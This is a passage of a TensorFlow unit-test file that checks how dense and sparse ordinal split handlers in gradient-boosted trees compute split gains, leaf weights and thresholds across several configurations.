resources.initialize_resources(resources.shared_resources()).run()
empty_gradients, empty_hessians = get_empty_tensors(
gradient_shape, hessian_shape)
example_weights = array_ops.ones([4, 1], dtypes.float32)
update_1 = split_handler.update_stats_sync(
0,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, False]))
with ops.control_dependencies([update_1]):
are_splits_ready = split_handler.make_splits(
np.int64(0), np.int64(1), class_id)[0]
with ops.control_dependencies([are_splits_ready]):
update_2 = split_handler.update_stats_sync(
1,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([False, True]))
with ops.control_dependencies([update_2]):
are_splits_ready2, partitions, gains, splits = (
split_handler.make_splits(np.int64(1), np.int64(2), class_id))
are_splits_ready, are_splits_ready2, partitions, gains, splits = (
sess.run([
are_splits_ready, are_splits_ready2, partitions, gains, splits
]))
# During the first iteration, inequality split handlers are not going to
# have any splits. Make sure that we return not_ready in that case.
self.assertFalse(are_splits_ready)
self.assertTrue(are_splits_ready2)
# The handler was inactive, so it shouldn't return any splits.
self.assertEqual(len(partitions), 0)
self.assertEqual(len(gains), 0)
self.assertEqual(len(splits), 0)
def testGenerateFeatureSplitCandidatesWithTreeComplexity(self):
with self.cached_session() as sess:
# The data looks like the following:
# Example | Gradients | Partition | Dense Quantile |
# i0 | (0.2, 0.12) | 0 | 1 |
# i1 | (-0.5, 0.07) | 0 | 1 |
# i2 | (1.2, 0.2) | 0 | 0 |
# i3 | (4.0, 0.13) | 1 | 1 |
dense_column = array_ops.constant([0.52, 0.52, 0.3, 0.52])
gradients = array_ops.constant([0.2, -0.5, 1.2, 4.0])
hessians = array_ops.constant([0.12, 0.07, 0.2, 0.13])
partition_ids = array_ops.constant([0, 0, 0, 1], dtype=dtypes.int32)
gradient_shape = tensor_shape.scalar()
hessian_shape = tensor_shape.scalar()
class_id = -1
split_handler = ordinal_split_handler.DenseSplitHandler(
l1_regularization=0.1,
l2_regularization=1.,
tree_complexity_regularization=0.5,
min_node_weight=0.,
epsilon=0.001,
num_quantiles=10,
feature_column_group_id=0,
dense_float_column=dense_column,
init_stamp_token=0,
gradient_shape=gradient_shape,
hessian_shape=hessian_shape,
multiclass_strategy=learner_pb2.LearnerConfig.TREE_PER_CLASS)
resources.initialize_resources(resources.shared_resources()).run()
empty_gradients, empty_hessians = get_empty_tensors(
gradient_shape, hessian_shape)
example_weights = array_ops.ones([4, 1], dtypes.float32)
update_1 = split_handler.update_stats_sync(
0,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_1]):
are_splits_ready = split_handler.make_splits(
np.int64(0), np.int64(1), class_id)[0]
with ops.control_dependencies([are_splits_ready]):
update_2 = split_handler.update_stats_sync(
1,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_2]):
are_splits_ready2, partitions, gains, splits = (
split_handler.make_splits(np.int64(1), np.int64(2), class_id))
are_splits_ready, are_splits_ready2, partitions, gains, splits = (
sess.run([
are_splits_ready, are_splits_ready2, partitions, gains, splits
]))
# During the first iteration, inequality split handlers are not going to
# have any splits. Make sure that we return not_ready in that case.
self.assertFalse(are_splits_ready)
self.assertTrue(are_splits_ready2)
self.assertAllEqual([0, 1], partitions)
# Check the split on partition 0.
# -(1.2 - 0.1) / (0.2 + 1)
expected_left_weight = -0.91666
# expected_left_weight * -(1.2 - 0.1)
expected_left_gain = 1.0083333333333331
# (-0.5 + 0.2 + 0.1) / (0.19 + 1)
expected_right_weight = 0.1680672
# expected_right_weight * -(-0.5 + 0.2 + 0.1)
expected_right_gain = 0.033613445378151252
# (0.2 + -0.5 + 1.2 - 0.1) ** 2 / (0.12 + 0.07 + 0.2 + 1)
expected_bias_gain = 0.46043165467625885
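# Illustrative note (not part of the original test): the expected values
# above follow the usual second-order split formulas with L1 shrinkage.
# Assuming |G| > l1 for a node with gradient sum G and hessian sum H,
#   weight = -(G - sign(G) * l1) / (H + l2)
#   gain   =  (G - sign(G) * l1) ** 2 / (H + l2)
# with l1=0.1 and l2=1.0 as configured for this handler.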
split_info = split_info_pb2.SplitInfo()
split_info.ParseFromString(splits[0])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.dense_float_binary_split
# Make sure the tree complexity regularization is subtracted from the gain.
self.assertAllClose(
expected_left_gain + expected_right_gain - expected_bias_gain - 0.5,
gains[0], 0.00001)
self.assertAllClose([expected_left_weight], left_child.value, 0.00001)
self.assertAllClose([expected_right_weight], right_child.value, 0.00001)
self.assertEqual(0, split_node.feature_column)
self.assertAllClose(0.3, split_node.threshold, 0.00001)
# Check the split on partition 1.
# (-4 + 0.1) / (0.13 + 1)
expected_left_weight = -3.4513274336283186
# (-4 + 0.1) ** 2 / (0.13 + 1)
expected_left_gain = 13.460176991150442
expected_right_weight = 0
expected_right_gain = 0
# (-4 + 0.1) ** 2 / (0.13 + 1)
expected_bias_gain = 13.460176991150442
# Verify candidate for partition 1, there's only one active bucket here
# so -0.5 gain is expected (because of tree complexity).
split_info = split_info_pb2.SplitInfo()
split_info.ParseFromString(splits[1])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.dense_float_binary_split
self.assertAllClose(-0.5, gains[1], 0.00001)
self.assertAllClose([expected_left_weight], left_child.value, 0.00001)
self.assertAllClose([expected_right_weight], right_child.value, 0.00001)
self.assertEqual(0, split_node.feature_column)
self.assertAllClose(0.52, split_node.threshold, 0.00001)
def testGenerateFeatureSplitCandidatesWithMinNodeWeight(self):
with self.cached_session() as sess:
# The data looks like the following:
# Example | Gradients | Partition | Dense Quantile |
# i0 | (0.2, 0.12) | 0 | 1 |
# i1 | (-0.5, 0.07) | 0 | 1 |
# i2 | (1.2, 0.2) | 0 | 0 |
# i3 | (4.0, 2.0) | 1 | 1 |
dense_column = array_ops.constant([0.52, 0.52, 0.3, 0.52])
gradients = array_ops.constant([0.2, -0.5, 1.2, 4.0])
hessians = array_ops.constant([0.12, 0.07, 0.2, 2])
partition_ids = array_ops.constant([0, 0, 0, 1], dtype=dtypes.int32)
gradient_shape = tensor_shape.scalar()
hessian_shape = tensor_shape.scalar()
class_id = -1
split_handler = ordinal_split_handler.DenseSplitHandler(
l1_regularization=0.1,
l2_regularization=1.,
tree_complexity_regularization=0.5,
min_node_weight=1.5,
epsilon=0.001,
num_quantiles=10,
feature_column_group_id=0,
dense_float_column=dense_column,
init_stamp_token=0,
gradient_shape=gradient_shape,
hessian_shape=hessian_shape,
multiclass_strategy=learner_pb2.LearnerConfig.TREE_PER_CLASS)
resources.initialize_resources(resources.shared_resources()).run()
empty_gradients, empty_hessians = get_empty_tensors(
gradient_shape, hessian_shape)
example_weights = array_ops.ones([4, 1], dtypes.float32)
update_1 = split_handler.update_stats_sync(
0,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_1]):
are_splits_ready = split_handler.make_splits(
np.int64(0), np.int64(1), class_id)[0]
with ops.control_dependencies([are_splits_ready]):
update_2 = split_handler.update_stats_sync(
1,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_2]):
are_splits_ready2, partitions, gains, splits = (
split_handler.make_splits(np.int64(1), np.int64(2), class_id))
are_splits_ready, are_splits_ready2, partitions, gains, splits = (
sess.run([
are_splits_ready, are_splits_ready2, partitions, gains, splits
]))
# During the first iteration, inequality split handlers are not going to
# have any splits. Make sure that we return not_ready in that case.
self.assertFalse(are_splits_ready)
self.assertTrue(are_splits_ready2)
self.assertAllEqual([0, 1], partitions)
# Check that the gain on partition 0 is -0.5.
split_info = split_info_pb2.SplitInfo()
split_info.ParseFromString(splits[0])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.dense_float_binary_split
# Make sure the tree complexity regularization is subtracted from the gain.
self.assertAllClose(-0.5, gains[0], 0.00001)
self.assertEqual(0, split_node.feature_column)
# Check the split on partition 1.
# (-4 + 0.1) / (2 + 1)
expected_left_weight = -1.3
expected_right_weight = 0
# Verify candidate for partition 1, there's only one active bucket here
# so -0.5 gain is expected (because of tree complexity).
split_info = split_info_pb2.SplitInfo()
split_info.ParseFromString(splits[1])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.dense_float_binary_split
self.assertAllClose(-0.5, gains[1], 0.00001)
self.assertAllClose([expected_left_weight], left_child.value, 0.00001)
self.assertAllClose([expected_right_weight], right_child.value, 0.00001)
self.assertEqual(0, split_node.feature_column)
self.assertAllClose(0.52, split_node.threshold, 0.00001)
class SparseSplitHandlerTest(test_util.TensorFlowTestCase):
def testGenerateFeatureSplitCandidates(self):
with self.cached_session() as sess:
# The data looks like the following:
# Example | Gradients | Partition | Sparse Quantile |
# i0 | (0.2, 0.12) | 0 | 1 |
# i1 | (-0.5, 0.07) | 0 | N/A |
# i2 | (1.2, 0.2) | 0 | 0 |
# i3 | (4.0, 0.13) | 1 | 1 |
gradients = array_ops.constant([0.2, -0.5, 1.2, 4.0])
hessians = array_ops.constant([0.12, 0.07, 0.2, 0.13])
example_partitions = array_ops.constant([0, 0, 0, 1], dtype=dtypes.int32)
indices = array_ops.constant([[0, 0], [2, 0], [3, 0]], dtype=dtypes.int64)
values = array_ops.constant([0.52, 0.3, 0.52])
sparse_column = sparse_tensor.SparseTensor(indices, values, [4, 1])
gradient_shape = tensor_shape.scalar()
hessian_shape = tensor_shape.scalar()
class_id = -1
split_handler = ordinal_split_handler.SparseSplitHandler(
l1_regularization=0.0,
l2_regularization=2.0,
tree_complexity_regularization=0.0,
min_node_weight=0.0,
epsilon=0.01,
num_quantiles=2,
feature_column_group_id=0,
sparse_float_column=sparse_column,
init_stamp_token=0,
gradient_shape=gradient_shape,
hessian_shape=hessian_shape,
multiclass_strategy=learner_pb2.LearnerConfig.TREE_PER_CLASS)
resources.initialize_resources(resources.shared_resources()).run()
empty_gradients, empty_hessians = get_empty_tensors(
gradient_shape, hessian_shape)
example_weights = array_ops.ones([4, 1], dtypes.float32)
update_1 = split_handler.update_stats_sync(
0,
example_partitions,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_1]):
are_splits_ready = split_handler.make_splits(
np.int64(0), np.int64(1), class_id)[0]
with ops.control_dependencies([are_splits_ready]):
update_2 = split_handler.update_stats_sync(
1,
example_partitions,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_2]):
are_splits_ready2, partitions, gains, splits = (
split_handler.make_splits(np.int64(1), np.int64(2), class_id))
are_splits_ready, are_splits_ready2, partitions, gains, splits = (
sess.run([
are_splits_ready, are_splits_ready2, partitions, gains, splits
]))
# During the first iteration, inequality split handlers are not going to
# have any splits. Make sure that we return not_ready in that case.
self.assertFalse(are_splits_ready)
self.assertTrue(are_splits_ready2)
self.assertAllEqual([0, 1], partitions)
# Check the split on partition 0.
# -(0.2 + 1.2) / (0.12 + 0.2 + 2)
expected_left_weight = -0.603448275862069
# (0.2 + 1.2) ** 2 / (0.12 + 0.2 + 2)
expected_left_gain = 0.8448275862068965
# 0.5 / (0.07 + 2)
expected_right_weight = 0.24154589371980678
# 0.5 ** 2 / (0.07 + 2)
expected_right_gain = 0.12077294685990339
# (0.2 + 1.2 - 0.5) ** 2 / (0.12 + 0.2 + 0.07 + 2)
expected_bias_gain = 0.3389121338912133
split_info = split_info_pb2.SplitInfo()
split_info.ParseFromString(splits[0])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.sparse_float_binary_split_default_right
self.assertAllClose(
expected_left_gain + expected_right_gain - expected_bias_gain, gains[0])
self.assertAllClose([expected_left_weight], left_child.value)
self.assertAllClose([expected_right_weight], right_child.value)
self.assertEqual(0, split_node.split.feature_column)
self.assertAllClose(0.52, split_node.split.threshold)
# Check the split on partition 1.
expected_left_weight = -1.8779342723004695
expected_right_weight = 0
# Verify candidate for partition 1, there's only one active bucket here
# so zero gain is expected.
split_info.ParseFromString(splits[1])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.sparse_float_binary_split_default_left
self.assertAllClose(0.0, gains[1])
self.assertAllClose([expected_left_weight], left_child.value)
self.assertAllClose([expected_right_weight], right_child.value)
self.assertEqual(0, split_node.split.feature_column)
self.assertAllClose(0.52, split_node.split.threshold)
def testGenerateFeatureSplitCandidatesLossUsesSumReduction(self):
with self.cached_session() as sess:
# The data looks like the following:
# Example | Gradients | Partition | Sparse Quantile |
# i0 | (0.2, 0.12) | 0 | 1 |
# i1 | (-0.5, 0.07) | 0 | N/A |
# i2 | (1.2, 0.2) | 0 | 0 |
# i3 | (4.0, 0.13) | 1 | 1 |
gradients = array_ops.constant([0.2, -0.5, 1.2, 4.0])
hessians = array_ops.constant([0.12, 0.07, 0.2, 0.13])
example_partitions = array_ops.constant([0, 0, 0, 1], dtype=dtypes.int32)
indices = array_ops.constant([[0, 0], [2, 0], [3, 0]], dtype=dtypes.int64)
values = array_ops.constant([0.52, 0.3, 0.52])
sparse_column = sparse_tensor.SparseTensor(indices, values, [4, 1])
gradient_shape = tensor_shape.scalar()
hessian_shape = tensor_shape.scalar()
class_id = -1
split_handler = ordinal_split_handler.SparseSplitHandler(
l1_regularization=0.0,
l2_regularization=4.0,
tree_complexity_regularization=0.0,
min_node_weight=0.0,
epsilon=0.01,
num_quantiles=2,
feature_column_group_id=0,
sparse_float_column=sparse_column,
init_stamp_token=0,
gradient_shape=gradient_shape,
hessian_shape=hessian_shape,
multiclass_strategy=learner_pb2.LearnerConfig.TREE_PER_CLASS,
loss_uses_sum_reduction=True)
resources.initialize_resources(resources.shared_resources()).run()
empty_gradients, empty_hessians = get_empty_tensors(
gradient_shape, hessian_shape)
example_weights = array_ops.ones([4, 1], dtypes.float32)
update_1 = split_handler.update_stats_sync(
0,
example_partitions,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_1]):
are_splits_ready = split_handler.make_splits(
np.int64(0), np.int64(1), class_id)[0]
with ops.control_dependencies([are_splits_ready]):
update_2 = split_handler.update_stats_sync(
1,
example_partitions,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
update_3 = split_handler.update_stats_sync(
1,
example_partitions,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_2, update_3]):
are_splits_ready2, partitions, gains, splits = (
split_handler.make_splits(np.int64(1), np.int64(2), class_id))
are_splits_ready, are_splits_ready2, partitions, gains, splits = (
sess.run([
are_splits_ready, are_splits_ready2, partitions, gains, splits
]))
# During the first iteration, inequality split handlers are not going to
# have any splits. Make sure that we return not_ready in that case.
self.assertFalse(are_splits_ready)
self.assertTrue(are_splits_ready2)
self.assertAllEqual([0, 1], partitions)
# Check the split on partition 0.
# -(0.4 + 2.4) / (0.24 + 0.4 + 4)
expected_left_weight = -0.603448275862069
# (0.4 + 2.4) ** 2 / (0.24 + 0.4 + 4)
expected_left_gain = 1.689655172413793
# 1 / (0.14 + 4)
expected_right_weight = 0.24154589371980678
# 1 ** 2 / (0.14 + 4)
expected_right_gain = 0.24154589371980678
# (0.4 + 2.4 - 1) ** 2 / (0.24 + 0.4 + 0.14 + 4)
expected_bias_gain = 0.6778242677824265
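# Illustrative note (not part of the original test): with
# loss_uses_sum_reduction=True the two identical updates accumulate, so the
# per-node gradient and hessian sums are doubled compared to the previous
# test; since l2 is also doubled here (4 vs 2), the leaf weights stay the
# same while all gains double (e.g. 1.689655... = 2 * 0.8448275...).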
split_info = split_info_pb2.SplitInfo()
split_info.ParseFromString(splits[0])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.sparse_float_binary_split_default_right
self.assertAllClose(
expected_left_gain + expected_right_gain - expected_bias_gain, gains[0])
self.assertAllClose([expected_left_weight], left_child.value)
self.assertAllClose([expected_right_weight], right_child.value)
self.assertEqual(0, split_node.split.feature_column)
self.assertAllClose(0.52, split_node.split.threshold)
# Check the split on partition 1.
expected_left_weight = -1.8779342723004695
expected_right_weight = 0
# Verify candidate for partition 1, there's only one active bucket here
# so zero gain is expected.
split_info.ParseFromString(splits[1])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.sparse_float_binary_split_default_left
self.assertAllClose(0.0, gains[1])
self.assertAllClose([expected_left_weight], left_child.value)
self.assertAllClose([expected_right_weight], right_child.value)
self.assertEqual(0, split_node.split.feature_column)
self.assertAllClose(0.52, split_node.split.threshold)
def testGenerateFeatureSplitCandidatesMulticlassFullHessian(self):
with self.cached_session() as sess:
# Batch is 4, 2 classes
gradients = array_ops.constant([[0.2, 1.4], [-0.5, 0.1], [1.2, 3],
[4.0, -3]])
# 2x2 matrix for each instance
hessian_0 = [[0.12, 0.02], [0.3, 0.11]]
hessian_1 = [[0.07, -0.2], [-0.5, 0.2]]
hessian_2 = [[0.2, -0.23], [-0.8, 0.9]]
hessian_3 = [[0.13, -0.3], [-1.5, 2.2]]
hessians = array_ops.constant(
[hessian_0, hessian_1, hessian_2, hessian_3])
example_partitions = array_ops.constant([0, 0, 0, 1], dtype=dtypes.int32)
indices = array_ops.constant([[0, 0], [2, 0], [3, 0]], dtype=dtypes.int64)
values = array_ops.constant([0.52, 0.3, 0.52])
sparse_column = sparse_tensor.SparseTensor(indices, values, [4, 1])
gradient_shape = tensor_shape.TensorShape([2])
hessian_shape = tensor_shape.TensorShape([2, 2])
class_id = -1
split_handler = ordinal_split_handler.SparseSplitHandler(
l1_regularization=0.0,
l2_regularization=2.0,
tree_complexity_regularization=0.0,
min_node_weight=0.0,
epsilon=0.01,
num_quantiles=2,
feature_column_group_id=0,
sparse_float_column=sparse_column,
init_stamp_token=0,
gradient_shape=gradient_shape,
hessian_shape=hessian_shape,
multiclass_strategy=learner_pb2.LearnerConfig.FULL_HESSIAN)
resources.initialize_resources(resources.shared_resources()).run()
empty_gradients, empty_hessians = get_empty_tensors(
gradient_shape, hessian_shape)
example_weights = array_ops.ones([4, 1], dtypes.float32)
update_1 = split_handler.update_stats_sync(
0,
example_partitions,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_1]):
are_splits_ready = split_handler.make_splits(
np.int64(0), np.int64(1), class_id)[0]
with ops.control_dependencies([are_splits_ready]):
update_2 = split_handler.update_stats_sync(
1,
example_partitions,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_2]):
are_splits_ready2, partitions, gains, splits = (
split_handler.make_splits(np.int64(1), np.int64(2), class_id))
are_splits_ready, are_splits_ready2, partitions, gains, splits = (
sess.run([
are_splits_ready, are_splits_ready2, partitions, gains, splits
]))
self.assertFalse(are_splits_ready)
self.assertTrue(are_splits_ready2)
split_info = split_info_pb2.SplitInfo()
split_info.ParseFromString(splits[0])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.sparse_float_binary_split_default_right
# Each leaf has a 2-element vector.
self.assertEqual(2, len(left_child.value))
self.assertEqual(2, len(right_child.value))
self.assertEqual(0, split_node.split.feature_column)
self.assertAllClose(0.52, split_node.split.threshold)
split_info.ParseFromString(splits[1])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.sparse_float_binary_split_default_left
self.assertEqual(2, len(left_child.value))
self.assertEqual(0, split_node.split.feature_column)
self.assertAllClose(0.52, split_node.split.threshold)
def testGenerateFeatureSplitCandidatesMulticlassDiagonalHessian(self):
with self.cached_session() as sess:
# Batch is 4, 2 classes
gradients = array_ops.constant([[0.2, 1.4], [-0.5, 0.1], [1.2, 3],
[4.0, -3]])
# Each hessian is a diagonal from a full hessian matrix.
hessian_0 = [0.12, 0.11]
hessian_1 = [0.07, 0.2]
hessian_2 = [0.2, 0.9]
hessian_3 = [0.13, 2.2]
hessians = array_ops.constant(
[hessian_0, hessian_1, hessian_2, hessian_3])
example_partitions = array_ops.constant([0, 0, 0, 1], dtype=dtypes.int32)
indices = array_ops.constant([[0, 0], [2, 0], [3, 0]], dtype=dtypes.int64)
values = array_ops.constant([0.52, 0.3, 0.52])
sparse_column = sparse_tensor.SparseTensor(indices, values, [4, 1])
gradient_shape = tensor_shape.TensorShape([2])
hessian_shape = tensor_shape.TensorShape([2])
class_id = -1
split_handler = ordinal_split_handler.SparseSplitHandler(
l1_regularization=0.0,
l2_regularization=2.0,
tree_complexity_regularization=0.0,
min_node_weight=0.0,
epsilon=0.01,
num_quantiles=2,
feature_column_group_id=0,
sparse_float_column=sparse_column,
init_stamp_token=0,
gradient_shape=gradient_shape,
hessian_shape=hessian_shape,
multiclass_strategy=learner_pb2.LearnerConfig.DIAGONAL_HESSIAN)
resources.initialize_resources(resources.shared_resources()).run()
empty_gradients, empty_hessians = get_empty_tensors(
gradient_shape, hessian_shape)
example_weights = array_ops.ones([4, 1], dtypes.float32)
update_1 = split_handler.update_stats_sync(
0,
example_partitions,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_1]):
are_splits_ready = split_handler.make_splits(
np.int64(0), np.int64(1), class_id)[0]
with ops.control_dependencies([are_splits_ready]):
update_2 = split_handler.update_stats_sync(
1,
example_partitions,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_2]):
are_splits_ready2, partitions, gains, splits = (
split_handler.make_splits(np.int64(1), np.int64(2), class_id))
are_splits_ready, are_splits_ready2, partitions, gains, splits = (
sess.run([
are_splits_ready, are_splits_ready2, partitions, gains, splits
]))
self.assertFalse(are_splits_ready)
self.assertTrue(are_splits_ready2)
split_info = split_info_pb2.SplitInfo()
split_info.ParseFromString(splits[0])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.sparse_float_binary_split_default_right
# Each leaf has a 2-element vector.
self.assertEqual(2, len(left_child.value))
self.assertEqual(2, len(right_child.value))
self.assertEqual(0, split_node.split.feature_column)
self.assertAllClose(0.52, split_node.split.threshold)
split_info.ParseFromString(splits[1])
left_child = split_info.left_child.vector
right_child = split_info.right_child.vector
split_node = split_info.split_node.sparse_float_binary_split_default_left
self.assertEqual(2, len(left_child.value))
self.assertEqual(0, split_node.split.feature_column)
self.assertAllClose(0.52, split_node.split.threshold)
def testGenerateFeatureSplitCandidatesInactive(self):
with self.cached_session() as sess:
# The data looks like the following:
# Example | Gradients | Partition | Sparse Quantile |
# i0 | (0.2, 0.12) | 0 | 1 |
# i1 | (-0.5, 0.07) | 0 | N/A |
# i2 | (1.2, 0.2) | 0 | 0 |
# i3 | (4.0, 0.13) | 1 | 1 |
gradients = array_ops.constant([0.2, -0.5, 1.2, 4.0])
hessians = array_ops.constant([0.12, 0.07, 0.2, 0.13])
example_partitions = array_ops.constant([0, 0, 0, 1], dtype=dtypes.int32)
indices = array_ops.constant([[0, 0], [2, 0], [3, 0]], dtype=dtypes.int64)
values = array_ops.constant([0.52, 0.3, 0.52])
sparse_column = sparse_tensor.SparseTensor(indices, values, [4, 1])
gradient_shape = tensor_shape.scalar()
hessian_shape = tensor_shape.scalar()
class_id = -1
split_handler = ordinal_split_handler.SparseSplitHandler(
l1_regularization=0.0,
l2_regularization=2.0,
tree_complexity_regularization=0.0,
min_node_weight=0.0,
epsilon=0.01,
num_quantiles=2,
feature_column_group_id=0,
gradient_shape=gradient_shape,
hessian_shape=hessian_shape,
sparse_float_column=sparse_column,
init_stamp_token=0,
multiclass_strategy=learner_pb2.LearnerConfig.TREE_PER_CLASS)
resources.initialize_resources(resources.shared_resources()).run()
empty_gradients, empty_hessians = get_empty_tensors(
gradient_shape, hessian_shape)
example_weights = array_ops.ones([4, 1], dtypes.float32)
update_1 = split_handler.update_stats_sync(
0,
example_partitions,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, False]))
with ops.control_dependencies([update_1]):
are_splits_ready = split_handler.make_splits(
np.int64(0), np.int64(1), class_id)[0]
with ops.control_dependencies([are_splits_ready]):
update_2 = split_handler.update_stats_sync(
1,
example_partitions,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([False, True]))
with ops.control_dependencies([update_2]):
are_splits_ready2, partitions, gains, splits = (
split_handler.make_splits(np.int64(1), np.int64(2), class_id))
are_splits_ready, are_splits_ready2, partitions, gains, splits = (
sess.run([
are_splits_ready, are_splits_ready2, partitions, gains, splits
]))
# During the first iteration, inequality split handlers are not going to
# have any splits. Make sure that we return not_ready in that case.
self.assertFalse(are_splits_ready)
self.assertTrue(are_splits_ready2)
# The handler was inactive, so it shouldn't return any splits.
self.assertEqual(len(partitions), 0)
self.assertEqual(len(gains), 0)
self.assertEqual(len(splits), 0)
def testEmpty(self):
with self.cached_session() as sess:
indices = constant_op.constant_v1([], dtype=dtypes.int64, shape=[0, 2])
# No values in this feature column in this mini-batch.
values = constant_op.constant_v1([], dtype=dtypes.float32)
sparse_column = sparse_tensor.SparseTensor(indices, values, [4, 1])
gradient_shape = tensor_shape.scalar()
hessian_shape = tensor_shape.scalar()
class_id = -1
split_handler = ordinal_split_handler.SparseSplitHandler(
l1_regularization=0.0,
l2_regularization=2.0,
tree_complexity_regularization=0.0,
min_node_weight=0.0,
epsilon=0.01,
num_quantiles=2,
feature_column_group_id=0,
sparse_float_column=sparse_column,
init_stamp_token=0,
gradient_shape=gradient_shape,
hessian_shape=hessian_shape,
multiclass_strategy=learner_pb2.LearnerConfig.TREE_PER_CLASS)
resources.initialize_resources(resources.shared_resources()).run()
gradients = array_ops.constant([0.2, -0.5, 1.2, 4.0])
hessians = array_ops.constant([0.12, 0.07, 0.2, 0.13])
partition_ids = array_ops.constant([0, 0, 0, 1], dtype=dtypes.int32)
empty_gradients, empty_hessians = get_empty_tensors(
gradient_shape, hessian_shape)
example_weights = array_ops.ones([4, 1], dtypes.float32)
update_1 = split_handler.update_stats_sync(
0,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_1]):
are_splits_ready = split_handler.make_splits(
np.int64(0), np.int64(1), class_id)[0]
with ops.control_dependencies([are_splits_ready]):
update_2 = split_handler.update_stats_sync(
1,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_2]):
are_splits_ready2, partitions, gains, splits = (
split_handler.make_splits(np.int64(1), np.int64(2), class_id))
are_splits_ready, are_splits_ready2, partitions, gains, splits = (
sess.run([
are_splits_ready, are_splits_ready2, partitions, gains, splits
]))
self.assertFalse(are_splits_ready)
self.assertTrue(are_splits_ready2)
self.assertEqual(len(partitions), 0)
self.assertEqual(len(gains), 0)
self.assertEqual(len(splits), 0)
def testEmptyBuckets(self):
"""Test that reproduces the case when quantile buckets were empty."""
with self.cached_session() as sess:
sparse_column = array_ops.sparse_placeholder(dtypes.float32)
# We have two batches - in the first one, the sparse feature is empty.
empty_indices = constant_op.constant_v1([], dtype=dtypes.int64,
shape=[0, 2])
empty_values = constant_op.constant_v1([], dtype=dtypes.float32)
empty_sparse_column = sparse_tensor.SparseTensor(empty_indices,
empty_values, [4, 2])
empty_sparse_column = empty_sparse_column.eval(session=sess)
# For the second batch, the sparse feature is not empty.
non_empty_indices = array_ops.constant(
[[0, 0], [2, 1], [3, 2]], dtype=dtypes.int64, shape=[3, 2])
non_empty_values = array_ops.constant(
[0.52, 0.3, 0.52], dtype=dtypes.float32)
non_empty_sparse_column = sparse_tensor.SparseTensor(
non_empty_indices, non_empty_values, [4, 2])
non_empty_sparse_column = non_empty_sparse_column.eval(session=sess)
gradient_shape = tensor_shape.scalar()
hessian_shape = tensor_shape.scalar()
class_id = -1
split_handler = ordinal_split_handler.SparseSplitHandler(
l1_regularization=0.0,
l2_regularization=2.0,
tree_complexity_regularization=0.0,
min_node_weight=0.0,
epsilon=0.01,
num_quantiles=2,
feature_column_group_id=0,
sparse_float_column=sparse_column,
init_stamp_token=0,
gradient_shape=gradient_shape,
hessian_shape=hessian_shape,
multiclass_strategy=learner_pb2.LearnerConfig.TREE_PER_CLASS)
resources.initialize_resources(resources.shared_resources()).run()
gradients = array_ops.constant([0.2, -0.5, 1.2, 4.0])
hessians = array_ops.constant([0.12, 0.07, 0.2, 0.13])
partition_ids = array_ops.constant([0, 0, 0, 1], dtype=dtypes.int32)
empty_gradients, empty_hessians = get_empty_tensors(
gradient_shape, hessian_shape)
example_weights = array_ops.ones([4, 1], dtypes.float32)
update_1 = split_handler.update_stats_sync(
0,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
with ops.control_dependencies([update_1]):
are_splits_ready = split_handler.make_splits(
np.int64(0), np.int64(1), class_id)[0]
# First, calculate quantiles and try to update on empty data for a
# feature.
are_splits_ready = (
sess.run(
are_splits_ready,
feed_dict={sparse_column: empty_sparse_column}))
self.assertFalse(are_splits_ready)
update_2 = split_handler.update_stats_sync(
1,
partition_ids,
gradients,
hessians,
empty_gradients,
empty_hessians,
example_weights,
is_active=array_ops.constant([True, True]))
